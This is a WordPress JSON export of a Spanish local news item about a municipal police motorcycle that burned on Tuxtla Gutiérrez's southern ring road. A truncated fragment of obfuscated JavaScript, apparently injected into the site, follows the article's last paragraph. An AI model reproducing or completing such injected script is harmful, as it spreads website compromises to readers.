{"id":8392,"date":"2023-01-30T02:19:11","date_gmt":"2023-01-30T02:19:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8392"},"modified":"2023-01-30T02:19:12","modified_gmt":"2023-01-30T02:19:12","slug":"motopatrulla-se-incendia-en-el-periferico-sur-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8392","title":{"rendered":"Motopatrulla se incendia en el perif\u00e9rico Sur de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045044633.jpg\" alt=\"\" class=\"wp-image-8393\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045044633.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1675045044633-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 29 de enero del 2023. Tuxtla Guti\u00e9rrez.- Una motopatrulla qued\u00f3 reducida a cenizas este domingo en el Perif\u00e9rico Sur de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando la unidad de la Secretaria de Seguridad P\u00fablica y Tr\u00e1nsito Municipal transitaba en esta v\u00eda a a la altura de la Prolongaci\u00f3n del Libramiento Sur, cuando comenz\u00f3 a incendiarse.<\/p>\n\n\n\n<p>El uniformado que la maniobra pidi\u00f3 ayuda v\u00eda radio pero el fuego se propag\u00f3 de inmediato y la unidad Vento 400 CC qued\u00f3 reducida a cenizas en unos minutos.<\/p>\n\n\n\n<p>Elementos de Protecci\u00f3n Civil Municipal acudieron al lugar pero nada pudieron hacer.<\/p>\n\n\n\n<p>Finalmente una gr\u00faa llev\u00f3 la unidad a un corral\u00f3n en turno.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 29 de enero del 2023. Tuxtla Guti\u00e9rrez.- Una motopatrulla qued\u00f3 reducida a cenizas este domingo en el Perif\u00e9rico Sur de Tuxtla Guti\u00e9rrez. De acuerdo con los primeros reportes, este hecho ocurri\u00f3 cuando la unidad de la Secretaria de Seguridad P\u00fablica y Tr\u00e1nsito Municipal transitaba en esta v\u00eda a a la altura &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8392","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8392"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8392\/revisions"}],"predecessor-version":[{"id":8394,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8392\/revisions\/8394"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8393"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}